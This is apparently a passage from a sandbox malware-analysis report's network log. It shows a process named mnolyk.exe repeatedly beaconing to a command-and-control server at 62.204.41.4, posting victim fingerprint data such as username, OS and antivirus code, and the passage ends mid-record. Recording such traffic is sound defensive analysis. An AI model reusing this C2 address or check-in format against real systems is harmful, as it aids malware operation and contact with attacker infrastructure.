Feb 7, 2023 20:02:44.221028090 CET	541	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
394	192.168.2.6	50118	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:44.402579069 CET	542	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:44.465873003 CET	542	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
395	192.168.2.6	50119	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:44.644393921 CET	543	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:44.708594084 CET	543	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
396	192.168.2.6	50120	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:44.901957989 CET	544	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:44.966161013 CET	544	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
397	192.168.2.6	50121	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:45.141107082 CET	545	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:45.206444025 CET	545	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
398	192.168.2.6	50122	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:45.389627934 CET	546	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:45.454247952 CET	546	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
399	192.168.2.6	50123	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:45.637794971 CET	547	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:45.702547073 CET	547	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49722	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:51.810569048 CET	109	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:51.875080109 CET	109	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.6	49758	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:00.586842060 CET	146	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:00.650304079 CET	146	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
400	192.168.2.6	50124	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:45.914006948 CET	548	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:45.979562998 CET	548	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
401	192.168.2.6	50125	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:46.439462900 CET	549	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:46.504683971 CET	549	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
402	192.168.2.6	50126	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:46.754868984 CET	550	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:46.818093061 CET	550	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
403	192.168.2.6	50127	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:47.079663992 CET	551	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:47.145004034 CET	551	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
404	192.168.2.6	50128	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:48.244683027 CET	552	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:48.310873032 CET	552	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
405	192.168.2.6	50129	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:48.528501034 CET	553	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:48.591860056 CET	553	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
406	192.168.2.6	50130	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:48.878882885 CET	554	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:48.944351912 CET	554	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
407	192.168.2.6	50131	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:50.831578970 CET	555	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:50.898102045 CET	555	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
408	192.168.2.6	50132	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:51.157887936 CET	556	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:51.223545074 CET	556	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
409	192.168.2.6	50133	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:51.437304974 CET	557	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:51.502486944 CET	557	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.6	49759	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:00.829526901 CET	147	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:00.893472910 CET	147	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
410	192.168.2.6	50134	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:51.667515993 CET	557	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:51.730381012 CET	558	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
411	192.168.2.6	50135	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:51.914333105 CET	559	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:51.976408958 CET	559	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
412	192.168.2.6	50136	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
